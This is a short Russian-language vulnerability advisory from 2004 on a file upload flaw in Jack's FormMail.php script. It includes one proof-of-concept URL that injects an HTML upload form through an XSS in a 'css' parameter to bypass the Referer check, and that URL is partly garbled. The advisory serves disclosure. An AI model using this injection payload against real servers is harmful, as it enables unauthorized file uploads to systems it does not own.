Загрузка произвольных файлов на сервер через XSS в Jack's FormMail.php сценарии

Дата публикации:
11.02.2004
Всего просмотров:
1304
Опасность:
Критическая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Jack's FormMail.php

Описание: Уязвимость обнаружена в Jack's FormMail.php сценарии. Удаленный пользователь может загружать файлы на целевую систему.

Удаленный пользователь может обойти ограничения доступа по HTTP Referer, чтобы загрузить файл на целевую систему. Для этого, удаленный пользователь должен эксплуатировать связанную уязвимость (типа XSS):

http://[target]/foo.php?css=<form%20method=post%20e nctype=multipart/form-data%
20action=formmail.php><input%20type=hidden%20name=MAX_FILE_SIZ
l><input%20type=file%20name=file%20><input%20type=hidden%20name=recipient%20%20 
value=%20foo@foo.com%20><input%20type=submit>

URL производителя: http://www.dtheatre.com/scripts/formmail

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: formmail (PHP) Upload file using CSS

или введите имя

CAPTCHA